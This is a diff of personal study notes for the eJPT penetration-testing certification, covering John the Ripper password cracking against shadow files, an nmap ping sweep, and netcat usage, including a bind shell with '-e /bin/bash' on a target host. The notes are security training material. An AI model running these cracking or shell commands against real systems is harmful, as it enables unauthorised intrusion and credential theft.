osV22/ejpt_notes/README.md

 ### Passwords
 - John the Ripper
   - `unshadow passwd shadow > crackme` - Sets the pass/ shadow in a format john will accept to begin cracking on crackme
+  - `john --wordlist=/usr/share/SecLists/Passwords.txt --pot=hashestocrack hashestocrack` - Will overwrite the john pot file in casse you want to run mutlipe attempts on the same file in the same session.
-  - `john -incremental -users:<list of users or just one EX: Brian> crackme` - Will only attempt specified users instead of going through all.
+  - `john --incremental --users:<list of users or just one EX: Brian> crackme` - NOTE: Incremental is not meant to be used with a wordlist and will attempt typical bruteforce.
+Will only attempt specified users instead of going through all.
-  - `john -wordlist -users:victim1,victim2 crackme` - Uses default wordlist for a dictionary attack
+  - `john --wordlist --users:victim1,victim2 crackme` - Uses default wordlist for a dictionary attack
-    - `john -wordlist=/usr/share/wordlist/rockyou.txt -users:vitcim1 crackme` - Using custom wordlists
+    - `john --wordlist=/usr/share/wordlist/rockyou.txt --users:vitcim1 crackme` - Using custom wordlists

 ### Helpful Commands
-- `nmap -sn 10.10.10.22/24 | grep -oP '(?<=Nmap scan report for )[^ ]*'` Clean nmap ping sweep
+- `nmap -sn 10.10.10.22/24 | grep -oP '(?<=Nmap scan report for )[^ ]*'` Clean nmap ping sweep - WARNING: can omit some alive hosts out
 - `nc -v 127.0.0.1 8888` will let us contact a listening port on the target adress here localhost.
 This is not to be confused with the listener we typical use in reverse shells `nc nvlp 8888`.
 The first command is used to call the second command and establish connection.
 - For a simple shell if target host has nc:
   - On target host: `nc -nvlp 1337 -e /bin/bash` where `-e` executes any command.